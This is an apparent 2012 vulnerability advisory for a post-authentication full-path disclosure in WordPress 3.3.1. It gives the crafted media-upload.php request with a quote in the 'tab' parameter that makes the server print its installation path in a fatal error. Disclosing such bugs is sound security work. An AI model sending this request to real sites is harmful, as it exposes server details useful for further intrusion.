# TITLE ....... # Wordpress 3.3.1 post-auth information disclosure .... #
# DATE ........ # 17.02.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # http://wordpress.org ................................ #
# VERSION ..... # 1.0.0 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
# 2. What is the type of vulnerability?
This vulnerability shows us full path to Wordpress installation on server.
Information disclosure bug.
Vulnerability can be triggered by users with 'subscriber' role.
For some cases bug is available for 'editor'-role users too.
# 3. Where is bug :)
Go to Your /wordpress/wp-admin/media-upload.php?type=image&tab='&post_id=6
You should see now something similar to:
"Fatal error: Maximum execution time of 30 seconds exceeded in
/path/to/your/wordpress/wp-includes/plugin.php on line 148."
So:
@Wordpress/wp-includes$ cat -n plugin.php | grep 148
148 array_pop($wp_current_filter);
Enjoy ;)
# 4. More...
- http://www.wordpress.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
# Best regards
#